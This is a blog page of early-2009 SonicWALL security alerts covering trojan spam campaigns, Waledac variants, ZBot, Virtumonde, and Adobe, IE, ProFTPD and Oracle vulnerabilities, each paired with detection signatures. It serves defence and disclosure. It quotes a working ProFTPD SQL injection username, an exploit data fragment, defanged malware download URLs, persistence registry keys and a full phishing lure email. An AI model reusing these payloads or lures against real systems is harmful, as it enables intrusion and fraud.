Posts

Delta Airline spammed trojan (Mar 5, 2009)

/in /by

–Updated March 5, 2009—

SonicWALL UTM Research team saw two separate waves of Delta Arline spammed Trojan campaign with different attachment payloads between March 2, 2009 and March 5, 2009.

SonicWALL Gateway Antivirus provided proactive protection against these new waves via GAV: Delf.KD (Trojan) signature that was released on Feb 26, 2009. Total Signature hits recorded till now – 137,480 hits (Signature statistics image below)

————————————————

–Original publish date: February 26, 2009—

SonicWALL UTM Research team observed a new spam campaign starting today, February 26, 2009 which involves a fake e-mail pretending to be arriving from Delta Airlines and containing passenger itinerary receipt. The email has a zip archived attachment which contains the new Trojan executable.

SonicWALL has received more than 1,000 e-mail copies of this malware so far. The e-mail message contains:

Attachment: delta_RQ763.zip (contains delta_RQ763.exe)

Subject:

  • Confirmation of airline ticket purchase at www.delta.com

Email Body:
————————
Thanks for the purchase!

Booking number: (random alpha-numeric string)

You will find attached to this letter PASSENGER ITINERARY RECEIPT of your electronic ticket. It verifies that you paid the ticket in full and confirms your right for air travel and luggage transportation by the indicated flight Delta Air Lines.

On board you will be offered: – beverages; – food; – daily press.

You are guaranteed top-quality services and attention on the part of our benevolent personnel.

We recommend you to print PASSENGER ITINERARY RECEIPT and take it alone to the airport. It will help you to pass control and registration procedures faster.

See you on board! Best regards,

Delta Air Lines
————————

A sample of spammed e-mail message looks like this:

screenshot

The executable file inside the zip attachment has an icon disguised as a Microsoft Excel file and it looks like following:

screenshot

The Trojan when executed creates following files:

  • (SYSTEM-DIR)twain32local.ds
  • (SYSTEM-DIR)twain32user.ds
  • (SYSTEM-DIR)twain32user.ds.lll
  • (SYSTEM-DIR)twex.exe

It modifies the following Registry key to ensure that Trojan runs every time the system restarts:

  • HKLMSOFTWAREMicrosoftWindows NTCurrentVersionWinlogonUserinit: “C:WINDOWSsystem32userinit.exe,C:WINDOWSsystem32twex.exe,”

It also tries to connect and download a file from the following URL:

  • hxxp://91.211.65.33/ejik/admin.bin (<- Encrypted configuration data file)

The Trojan has very low detection at the time of writing this alert. It is also known as trojan W32/Trojan2.FXRO [F-Prot] and Trojan-Dropper.Delf [Ikarus].

SonicWALL Gateway Antivirus provides protection against this malware via GAV: Delf.KD (Trojan) signature.

screenshot

Waledac Couponizer Trojan (March 3, 2009)

/in /by

This week, SonicWALL UTM Research team observed new variants of Waledac. They switched to using coupons theme: by making copies of couponizer.com and sending emails that link to the spoofed look-alike sites.

Users can differentiate between the infected sites and the legitimate couponizer.com website by pointing the mouse cursor over any of the images on the page and checking which link is displayed in the browser’s status bar. If the link is to a executable file (.exe) this page is malware.

In addition these variants incorporate IP address geolocation, which is a way of determining a user’s location based on the IP address. The user’s IP address is queried to determine its location, then the results of that query are put into the webpage. The websites used in this attack include:

  • adorelyricxx.com
  • bestcouponfreexx.com
  • bestlovelongxx.com
  • codecouponsitexx.com
  • funloveonlinexx.com
  • funnyvalentinessitexx.com
  • greatcouponclubxx.com
  • greatsalesavailablexx.com
  • greatsalestaxxx.com
  • supersalesonlinexx.com
  • youradorexx.com
  • yourmazdatributexx.com

These domains resolve to different IP addresses every time they are visited. The filenames are also rotated. Some of the filenames used in this wave are:

  • couponslist.exe
  • nocrisis.exe
  • saleslist.exe
  • sales.exe

When executed this Waledac variant is almost identical in its behavior to the previous variant.

The malware has very low AV detection at the time of writing this Security Alert. SonicWALL Gateway Antivirus will detect this new Waledac variant with GAV signatures: Suspicious#waledac.6 (Worm), Agent.AINT (Trojan), Suspicious#waledac.5 (Worm) .

Here are some screenshots of the attack websites.

screenshot

screenshot

Adobe Embedded JBIG2 Stream BO (Feb 27, 2009)

/in /by

Adobe products are used for creating, distributing, authoring and viewing Portable Document Format (PDF) documents. The Adobe Reader and Adobe Acrobat are examples of such products. The PDF file format was created and is controlled by Adobe. The format allows for representation of text, images and graphics in a single document.

Binary data, such as images are represented in a PDF document by stream objects. A stream is represented by a series of bytes enclosed in the stream and endstream keywords. An example of a stream in a PDF file is shown: 

 stream 0099009900990099 endstream

A stream will generally be preceded by a definition describing its properties amongst which will be the filter which is to be used to interpret the respective stream. For example, an image compressed by the JBIG2 compression standard may look as follows: 

 << /Type /XObject /Subtype /Image /Length 100 /Filter [ /ASCIIHexDecode /JBIG2Decode ] >>  stream 1847509384750293847593847594837495874939203948405 8459484379857032975402398650432986502398538754934 endstream

The JBIG2 bit stream consists of segments, with each segment containing a header followed by data. The format of a JBIG2 segment header is of variable length based on the values contained therein. In certain specific situations, the Adobe application will use a supplied value in the header as an index into an array of pages without checking the value for validity first. The application will then attempt to write into the array using this index. The affected field which is controlled by the PDF author, can be manipulated to overwrite any location within a 32-bit address space. This gives a malicious user the capability to corrupt memory of the affected process, thereby potentially diverting the process flow.

In order to exploit this vulnerability, the target user must be enticed to open a malicious PDF document. Successful exploitation may allow arbitrary code injection and execution with the privileges of the currently logged in user. As of the writing of this report, the vulnerability is being exploited in the wild.

SonicWALL has released three IPS signatures to detect and block specific exploit attempts. The following signatures have been released to address this vulnerability:

  • 5401 – Adobe Multiple Products Embedded JBIG2 Stream BO PoC 1
  • 5402 – Adobe Multiple Products Embedded JBIG2 Stream BO PoC 2
  • 5403 – Adobe Multiple Products Embedded JBIG2 Stream BO PoC 3

ProFTPD SQL Injection Vulnerability (Feb 20, 2009)

/in /by

The ProFTPD server is a highly configurable GPL-licensed FTP server software mainly used in Linux distributions. In addition to using the host system for authentication, ProFTPD can authenticate users using a SQL database or LDAP.

When ProFTPD is configured to use a SQL database for authentication, it escapes and expands SQL statements before passing the query onto the database. After a SQL statement is escaped, ProFTPD performs various string substitutions on the SQL statement. These substitutions are performed using the function resolve_short_tag. resolves_short_tag transforms text, which it interprets as an internal ProFTPD tag, into a value. Tags are specified as strings with % as the first character. Since the function resolve_short_tag transforms SQL statements after they are escaped, ProFTPD is vulnerable to a SQL injection attack.

A remote attacker can exploit this vulnerability by specifying a “%'” (percent + single quote) string in the username following arbitrary SQL to be executed. For example, an attacker may specify the following string as the username:

root %’) and 1=2 union SELECT 1,1,uid,gid,homedir,shell from ftpuser —

ProFTPD would perform its escaping and transformation processes, causing the following SQL statement to be sent to the database:

SELECT userid, passwd, uid, gid, homedir, shell FROM ftpuser WHERE (userid=’root {UNKNOWN TAG}’) and 1=2 union SELECT 1,1,uid,gid,homedir,shell from ftpuser — ‘) LIMIT 1

A successful attack can allow the attacker to masquerade as an authenticated user and gain unauthorized access to the FTP server and the underlying database.

The vulnerability has been assigned as CVE-2009-0542.

SonicWALL has released the following IPS signature that will detect and prevent potential attacks leveraging this vulnerability:

  • 1376 FTP ProFTPD Server Username Handling SQL Injection Attempt

Waledac Valentine cards (February 19, 2009)

/in /by

This week, SonicWALL UTM Research team observed new variants of Waledac worm spreading in the wild and using Valentine’s theme. They send fake e-greeting card emails with a link to view an e-card to potential victims.

The websites used in this attack include:

  • adorelyricxx.com
  • adorepoemxx.com
  • adoresongxx.com
  • cherishletterxx.com
  • funloveonlinexx.com
  • goodnewsreviewxx.com
  • greatvalentinepoemsxx.com
  • orldlovelifexx.com
  • reportradioxx.com
  • spacemynewsxx.com
  • yourgreatlovexx.com

These domains resolve to different IP addresses every time they are visited. The filenames are also rotated. Some of the filenames used in this wave are:

  • Card.exe
  • cardviewer.exe
  • devkit.exe
  • download.exe
  • ecard.exe
  • install.exe
  • kit.exe
  • lovecard.exe
  • lovekit.exe
  • loveprogramm.exe
  • Loveu.exe
  • Luv.exe
  • Programm.exe
  • vcard.exe
  • viewer.exe
  • valkit.exe

When executed this Waledac variant is almost identical in its behavior to the previous variant.

The malware has very low AV detection at the time of writing this Security Alert. SonicWALL Gateway Antivirus will detect this new Waledac variant with GAV signatures: Suspicious#waledac.5 (Worm), Waledac.AG (Worm), Waledac.I_2 (Trojan) .

Here are some screenshots of the attack websites.

screenshot

MS09-002 Exploit (Feb 18, 2009)

/in /by

SonicWALL UTM Research Team has observed a new MS09-002 exploit being used in the wild in drive-by attacks.

This exploit involves a malicious Microsoft Word (.doc) document that uses XML format being delivered to the end user. The .doc has a file size of 3,871 bytes and attempts to exploit the Uninitialized Memory Corruption vulnerability (CVE-2009-0075) in Internet Explorer 7 patched by Microsoft in the MS09-002 patch release.

The malicious word document file contains the following specially crafted data bytes:

w:ocx w_data=”DATA:application/x-oleobject;BASE64,rv0krsYD0RGLdgCAx0TziQAAOAAAAGgAdAB0AHA (REMOVED) gAZQBuAGcAagBp AHQAagAuAGMAbwBtAC8AYgBiAHMALwBpAG0AYQBnAGUAcwA vAGEAbABpAHAAYQB5AC8AbQBtAC8A agBjAC8AagBjAC4AaAB0AG0AbAA= ” w_id=”DefaultOcxName” w_name=”DefaultOcxName” w_classid=”CLSID:AE24FDAE-03C6-11D1-8B76-0080C744F389″ w_w=”200″ w_h=”123″ wx_iPersistPropertyBag=”true”

When the end user opens the document file, it uses the Microsoft Scriptlet Component ActiveX control (CLSID:AE24FDAE-03C6-11D1-8B76-0080C744F389) to connect to following Malicious URL:

  • hxxp://(REMOVED)/bbs/images/alipay/mm/jc/jc.html [detected as GAV: XMLhttpd.D (Exploit)]

jc.html file contains an obfuscated javascript code that further downloads a Trojan from following URL:

  • hxxp://(REMOVED)/bbs/images/alipay/mm/jc/jc.exe [detected as GAV: Rincux_4 (Trojan)]

The exploit has very low detection and is also known as Exploit-MSWord.k trojan (McAfee). SonicWALL GAV detects this exploit as GAV: MSWord.K (Exploit)

Microsoft Security Bulletin Coverage (Feb 13, 2009)

/in /by

During the first 2 months of 2009 Microsoft has published 5 security bulletins. Among them, MS09-001, MS09-003 and MS09-004 address vulnerabilities on the server side, while MS09-002 and MS09-005 address vulnerabilities on the client side. SonicWALL UTM team has analyzed each security bulletin and released IPS signatures that detect/prevent potential attacks leveraging these vulnerabilities. Below is the summary of security bulletins and the corresponding SonicWALL signatures.

MS09-001 Vulnerabilities in SMB Could Allow Remote Code Execution

  • IPS Sid 5357 — NETBIOS MS SMB TRANS Request Error Handling Memory Corruption PoC (MS09-001)
    CVE-2008-4834
  • IPS Sid 5358 — NETBIOS MS SMB OPEN2 Request Error Handling Memory Corruption PoC (MS09-001)
    CVE-2008-4835

MS09-002 Cumulative Security Update for Internet Explorer

  • IPS Sid 5379 — WEB-CLIENT MS IE Cloned Object Memory Corruption Attempt (MS09-002)
    CVE-2009-0075
  • IPS Sid 5387 — WEB-CLIENT MS IE CSS Processing Memory Corruption PoC (MS09-002)
    CVE-2009-0076

MS09-003 Vulnerabilities in Microsoft Exchange Could Allow Remote Code Execution

  • IPS Sid 5383 — DOS MS Exchange System Attendant DoS
    CVE-2009-0099
  • IPS Sid 5385 — SMTP MS Exchange TNEF Integer Underflow PoC (MS09-003)
    CVE-2009-0098

MS09-004 Vulnerability in Microsoft SQL Server Could Allow Remote Code Execution

  • IPS Sid 1286 — MS-SQL SQL Server sp_replwritetovarbin Procedure Attempt (Unicode)
    CVE-2008-5416
  • IPS Sid 1292 — MS-SQL SQL Server sp_replwritetovarbin Procedure Attempt (ASCII)
    CVE-2008-5416
  • IPS Sid 1358 — MS-SQL SQL Server sp_replwritetovarbin Procedure Attempt (Unicode-SMB)
    CVE-2008-5416
  • IPS Sid 1360 — MS-SQL SQL Server sp_replwritetovarbin Procedure Attempt (ASCII-SMB)
    CVE-2008-5416

MS09-005 Vulnerabilities in Microsoft Office Visio Could Allow Remote Code Execution

  • IPS Sid 5384 — MISC MS Visio Object ID Table Memory Corruption PoC (MS09-005)
    CVE-2009-0097
  • IPS Sid 5386 — MISC MS Visio Invalid Tag Handling Memory Corruption PoC (MS09-005)
    CVE-2009-0096
  • IPS Sid 5389 — MS Visio VSD File Icon Bits Memory Corruption PoC (MS09-005)
    CVE-2009-0096

Besides enabling prevention for these signatures, customers are advised to run Windows Update and get latest patches from Microsoft in order to maximize the protection against potential exploits.

New ZBot Variant (Feb 12, 2009)

/in /by

SonicWALL UTM Research Team observed a new ZBot variant being distributed in the wild via drive-by download sites.

This ZBot variant was first seen in the wild on December 31, 2008 via following malicious site:

  • domainworksite.com/main/REMOVED (This domain is down now)

The malware when executed performs following tasks:

  • It runs in background and allows remote access to the compromised system.
  • It creates following files and directory:
    • C:WINDOWSsystem32twain32
    • C:WINDOWSsystem32twain32local.ds
    • C:WINDOWSsystem32twain32user.ds
    • C:WINDOWSsystem32twain32user.ds.lll
    • C:WINDOWSsystem32twex.exe
  • It creates and modifies following registry keys:
    • HKU.DEFAULTSoftwareMicrosoftWindowsCurrentVersionExplorer{43BF8CD1-C5D5-2230-7BB2-98F22C2B7DC6}
    • HKU.DEFAULTSoftwareMicrosoftProtected Storage System Provider
    • HKU.DEFAULTSoftwareMicrosoftProtected Storage System ProviderS-1-5-18
    • HKUS-1-5-19SoftwareMicrosoftProtected Storage System Provider
    • HKUS-1-5-19SoftwareMicrosoftProtected Storage System ProviderS-1-5-19
    • HKUS-1-5-18SoftwareMicrosoftWindowsCurrentVersionExplorer{43BF8CD1-C5D5-2230-7BB2-98F22C2B7DC6}
    • HKUS-1-5-18SoftwareMicrosoftProtected Storage System Provider
    • HKUS-1-5-18SoftwareMicrosoftProtected Storage System ProviderS-1-5-18
    • HKLMSOFTWAREMicrosoftWindows NTCurrentVersionWinlogonUserinit: “C:WINDOWSsystem32userinit.exe,C:WINDOWSsystem32twex.exe,” (Ensures that it runs every time windows restart)
  • It attempts to disable any Internet proxy settings and Windows Firewall. It also attempts to acquire privileges to monitors the list of running processes.

  • It tries to resolve uplevela.net domain and sends following HTTP request: GET /awstats/admin/conf.sts

This ZBot variant is also known as Trojan-Spy.Win32.Zbot.ipx (Kaspersky), Win32/Spy.Zbot.DH (ESET), and Generic PWS.y (McAfee). SonicWALL Gateway Antivirus detects this ZBot variant as GAV: ZBot.IPX (Trojan)

Virtumonde windshield malware (Feb 9, 2009)

/in /by

SonicWALL UTM Research team observed a new interesting social engineering trick to install malware: hackers are using fake parking violation warnings to trick motorists into visiting malware-infested websites.

A windshield flier was left in cars with a website address linked to a malicious file. The fliers said: 

  PARKING VIOLATION  This vehicle is in violation of  standard parking regulations.  To view pictures with information about  your parking preferences, go to  http://horribleparkxxxx.com/

The website serves the malicious file to the user: http://horribleparkxxxx.com/PictureSearchToolbar.exe

This malware: PictureSearchToolbar.exe is detected by SonicWALL as GAV: AgentBypass_6 (Trojan).

 

   screenshot

It is a variant of Virtumonde / Vundo family of trojan horse that cause popups and advertises rogue antispyware programs. (aka Win32/Vundo.JI [Microsoft]). PictureSearchToolbar.exe is 56,832 bytes in size and when it runs it drops these files on the system:

  • %Temp%awtrQGay.bat – 63 bytes
  • %System%yayyXRKe.dll – 38,912 bytes

It injects yayyXRKe.dll in explorer.exe process.

It also creates the following registry entries:

  • HKEY_LOCAL_MACHINESOFTWAREClassesCLSID{6D794CB4-C7CD-4c6f-BFDC-9B77AFBDC02C}
  • HKEY_LOCAL_MACHINESOFTWAREClassesCLSID{6D794CB4-C7CD-4c6f-BFDC-9B77AFBDC02C}InprocServer32
  • HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionControl PanelSettings
  • HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogonNotifyyayyXRKe
  • HKEY_LOCAL_MACHINESOFTWAREMicrosoft0cd0861
  • HKEY_CURRENT_USERSoftwareMicrosoftcs41275

It then attempts to download http://childxxxx.com/pas/apstpldr.dll.html?affid=177194&uid=&guid=16560F811C084DA3B8270F85F0661238 and save it as %System%awtrQGay.dll.

Downloaded malware: awtrQGay.dll is detected by SonicWALL as GAV: Monder_3 (Trojan), it is another variant of Virtumonde/Vundo trojan and attempts to install Fake Antivirus software from bestantispywaresecurityxxx.com

SonicWALL Gateway AntiVirus provides protection against this attack via GAV: Monder_3 (Trojan) and GAV: AgentBypass_6 (Trojan) signatures.

The following figures shows the recorded hits for GAV: Monder_3 (Trojan) signature.

screenshot

Oracle ODCITABLESTART Buffer Overflow (Feb 6, 2009)

/in /by

Oracle Database Server is an enterprise-level relational database application suite. Online Analytical Processing (OLAP) is one of the feature extensions available for Oracle Database Server to enhance its functionality. OLAP is fully integrated into the relational database, all data and metadata is stored and managed from within Oracle Database providing scalability and security.

There is a buffer overflow in the OLAP implementation of one of the functions in module SYS.OLAPIMPL_T, which is called ODCITABLESTART. This function is invoked to begin retrieving rows from a table. The vulnerability is due to an insufficient boundary check when processing the parameter DATA_MAP passed to the function. The definition of the function is shown: 

 int ODCITableStart(SCTX, CUBE, OBJECT_TYPE, DATA_MAP, LIMIT_MAP, RWS)

By exploiting this vulnerability, an attacker can inject and execute malicious code within the security context of the service process. On Windows platforms, in default configuration, the affected service is running with System privileges.

SonicWALL has released a signature to detect and block specific exploitation attempts targeting this vulnerability. The IPS signature is listed bellow:

  • 5372 – SYS.OLAPIMPL_T Package ODCITABLESTART BO Attempt

Please refer to CVE-2008-3974 for more details about the vulnerability